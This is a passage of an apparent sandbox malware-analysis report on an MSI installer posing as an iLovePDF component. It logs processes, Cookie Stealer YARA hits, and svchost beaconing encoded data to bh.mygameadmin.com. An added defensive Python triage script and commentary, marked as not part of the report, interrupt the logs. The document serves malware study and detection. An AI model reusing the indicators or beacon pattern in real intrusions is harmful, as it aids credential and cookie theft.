                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uLAFwLXyGPPDeDuTzEAYGTNoP%2BrU2Rqu9VpwcvV%2FJnmPEaI4h5e9piw6UviyVP4NEDEBDeNTDtm0K1P%2FY9sCQY1xYRS6zGI8WpUJuoWo6e6pvRs%2BTJrrA1SSwHLkJkBjCRfy5xY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a4752cfb074a-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49811
Destination IP: 104.21.75.46
Destination Port: 443
Process: C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-24 10:50:09 UTC | 4 kB | OUT
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Host: bh.mygameadmin.com
Content-Length: 558
Connection: Keep-Alive
Cache-Control: no-cache
2021-10-24 10:50:09 UTC | 4 kB | OUT
Data Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 43 6a 35 6a 54 31 74 53 6f 30 37 35 6d 6e 39 65 55 5a 36 69 43 6c 33 6d 38 69 6d 6d 50 6e 5a 75 31 71 62 35 6a 5a 34 36 66 5a 71 70 74 65 4e 53 66 61 4a 6c 37 61 4c 79 48 6e 59 65 24 6e 35 6d 63 6c 32 6e 57 5a 59 61 74 6e 57 4b 50 71 5a 52 39 6e 32 79 59 6c 34 6d 41 6c 47 43 62 69 32 5a 34 71 34 46 6f 6d 47 4f 61 61 32 6a 66 74 62 36 4c 6d 61 68 37 71 70 65 4c 69 5a 65 46 6a 70 69 70 61 4e 65 38 31 37 65 65 76 71 71 62 6d
Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaCj5jT1tSo075mn9eUZ6iCl3m8immPnZu1qb5jZ46fZqpteNSfaJl7aLyHnYe$n5mcl2nWZYatnWKPqZR9n2yYl4mAlGCbi2Z4q4FomGOaa2jftb6Lmah7qpeLiZeFjpipaNe817eevqqbm
2021-10-24 10:50:09 UTC | 5 kB | IN
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 10:50:09 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVQwNj3Kap4FKLvdJMaAtg9Mz9%2FrrG69k9B9uH4wfGH0wqgI%2BrFnZqFfS%2BpV1OEcCq3eMbq5FgqJqwhhZsDyPjerzbvG3%2FTIEcnfCSOxOWrLN5fk37Y%2BMT2OV5FHz0phpySXAbA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a32a47f3c4d1756-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-10-24 10:50:09 UTC | 5 kB | IN
Data Raw: 33 33 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 5b 5d 7d 0d 0a
Data Ascii: 33{"host":[],"spacing":1800,"spacing2":120,"data":[]}
2021-10-24 10:50:09 UTC | 5 kB | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.3
Source Port: 49812
Destination IP: 104.21.75.46
Destination Port: 443
Process: C:\Windows\System32\svchost.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-24 10:50:09 UTC | 5 kB | OUT
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Host: bh.mygameadmin.com
Content-Length: 254
Connection: Keep-Alive
Cache-Control: no-cache
2021-10-24 10:50:09 UTC | 6 kB | OUT
Data Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 71 61 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 75 48 33 39 79 5a 72 5a 71 6f 71 74 61 72 71 74 66 57 68 36 6a 63 71 6f 66 57 68 74 53 72 71 5a 76 66 33 35 71 74 68 6f 61 59 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 4b 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm19TWotfW36LXqKmiqammoKSmY2d5bG9ie294pt6kpquH39yZrZqoqtarqtfWh6jcqofWhtSrqZvf35qthoaYpqCkpmNqe5am3qSm3KLfpqCkppZ7fW9lYqbepKa@naagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
2021-10-24 10:50:10 UTC | 6 kB | IN
HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 10:50:10 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68TwEML4Cj7sr1PqJIQznNgRxV0YJLB%2FVClWpmfGY%2BZBID3jAMRjNo3X0iHULIZ1iakt4GBHxNqyGwnuU5LL9UfYzuDL2HtEJtOhLokMJjLeK4PIwNbJdMzMUjcJOG05sseGpDs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a32a48489c84a85-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-10-24 10:50:10 UTC | 7 kB | IN
Data Raw: 34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63 6b 22 3a 5b 5d 7d 7d 0d 0a
Data Ascii: 4e{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1,"ck":[],"insck":[]}}
2021-10-24 10:50:10 UTC | 7 kB | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
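All four sessions above have the same shape: svchost.exe sends a POST with an opaque p= value to bh.mygameadmin.com/report7.4.php under a Chrome User-Agent, and the server answers with a small chunked JSON object. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code. It de-chunks the response bytes copied from the report's "Data Raw" lines, applies the two metadata checks an analyst would want on such a session (a Windows system-directory binary issuing POSTs, a browser User-Agent on a non-browser process), and lists the characters in the p= value that fall outside the standard Base64 alphabet. The session dicts are hand-built from the tables above; the report does not state what "spacing" and "spacing2" mean, so they are only extracted, and the p= encoding is not decoded because the report does not document it.

```python
"""Added example: triage the svchost.exe -> bh.mygameadmin.com sessions.

Not part of the Joe Sandbox report. Response bytes are copied from the
report's "Data Raw" lines; session records are hand-reconstructed from the
report's session tables. "spacing"/"spacing2" meaning is not established by
the report, so they are extracted, not interpreted.
"""
import json
import re

# Chunked response body of session 2, hex exactly as printed in the report.
RESP_SESSION2_HEX = (
    "33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a"
    " 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61"
    " 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a"
    " 30 0d 0a 0d 0a"
)
# Chunked response body of session 4 (the one carrying "ck"/"insck").
RESP_SESSION4_HEX = (
    "34 65 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a"
    " 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61"
    " 22 3a 7b 22 63 6f 64 65 22 3a 31 2c 22 63 6b 22 3a 5b 5d 2c 22 69 6e 73 63"
    " 6b 22 3a 5b 5d 7d 7d 0d 0a"
    " 30 0d 0a 0d 0a"
)
# Request body of session 2 as the report's "Data Ascii" line shows it (truncated there).
BODY_SESSION2 = ("p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuW"
                 "pt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7"
                 "b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSm"
                 "lnt9b2Vipt6kpr6dpqCkpmifl")
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")

# Hand-reconstructed from the report's session tables (sessions 2 and 4).
SESSIONS = [
    {"id": 2, "src": ("192.168.2.3", 49808), "dst": ("104.21.75.46", 443),
     "process": r"C:\Windows\System32\svchost.exe", "host": "bh.mygameadmin.com",
     "request_line": "POST /report7.4.php HTTP/1.1", "user_agent": CHROME_UA,
     "content_length": 278, "response": bytes.fromhex(RESP_SESSION2_HEX)},
    {"id": 4, "src": ("192.168.2.3", 49812), "dst": ("104.21.75.46", 443),
     "process": r"C:\Windows\System32\svchost.exe", "host": "bh.mygameadmin.com",
     "request_line": "POST /report7.4.php HTTP/1.1", "user_agent": CHROME_UA,
     "content_length": 254, "response": bytes.fromhex(RESP_SESSION4_HEX)},
]


def decode_chunked(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: <hex size>CRLF<data>CRLF ... 0 CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; any trailer fields are ignored
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def parse_beacon_response(raw: bytes) -> dict:
    """The JSON object the server sent, after de-chunking."""
    return json.loads(decode_chunked(raw))


BROWSER_UA = re.compile(r"\b(Chrome|Firefox|Edg)/\d")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe")
NON_B64 = re.compile(r"[^A-Za-z0-9+/=]")


def review_session(s: dict) -> list:
    """Heuristic flags for one session; an empty list means nothing stood out."""
    proc = s["process"].lower()
    reasons = []
    if proc.startswith(SYSTEM_DIRS) and s["request_line"].startswith("POST "):
        reasons.append("POST from a Windows system-directory binary")
    if BROWSER_UA.search(s["user_agent"]) and not proc.endswith(BROWSERS):
        reasons.append("browser User-Agent on a non-browser process")
    return reasons


def odd_payload_chars(body: str) -> set:
    """Characters of the p= value outside the standard Base64 alphabet."""
    value = body[2:] if body.startswith("p=") else body
    return set(NON_B64.findall(value))


def triage_sessions(sessions: list) -> list:
    rows = []
    for s in sessions:
        doc = parse_beacon_response(s["response"])
        rows.append({"id": s["id"], "flags": review_session(s),
                     "spacing": doc.get("spacing"), "spacing2": doc.get("spacing2"),
                     "data": doc.get("data")})
    return rows


if __name__ == "__main__":
    for row in triage_sessions(SESSIONS):
        print(row)
    print("non-Base64 characters in p=:", odd_payload_chars(BODY_SESSION2))
```

The chunk sizes on the page check out against the decoder: 0x3b is the 59-byte object of sessions 1 and 2, 0x33 the 51-byte one of session 3, and 0x4e the 78-byte one of session 4.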


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  CPU Usage


                                                                                  Memory Usage


                                                                                  High Level Behavior Distribution


                                                                                  Behavior


                                                                                  System Behavior

General

Start time: 12:49:02
Start date: 24/10/2021
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
Imagebase: 0x7ff7a5c50000
File size: 66048 bytes
MD5 hash: 4767B71A318E201188A0D0A420C8B608
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:49:02
Start date: 24/10/2021
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff7a5c50000
File size: 66048 bytes
MD5 hash: 4767B71A318E201188A0D0A420C8B608
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:49:07
Start date: 24/10/2021
Path: C:\Windows\Installer\MSIFBC3.tmp
Wow64 process (32bit): true
Commandline: C:\Windows\Installer\MSIFBC3.tmp
Imagebase: 0x400000
File size: 7196212 bytes
MD5 hash: B6D7559D31D4FF2D02338DF9CEF2FBD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 12:49:08
Start date: 24/10/2021
Path: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Imagebase: 0x400000
File size: 3014144 bytes
MD5 hash: D73DDB8F6B777CC6411FD3CA254F3DEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low

General

Start time: 12:49:23
Start date: 24/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Imagebase: 0xb00000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:24
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:25
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k SystemNetworkService
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_CookieStealer, Description: Yara detected Cookie Stealer, Source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, Author: Joe Security
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:25
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:28
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:30
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:31
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:33
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:35
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 12:49:38
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:40
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth
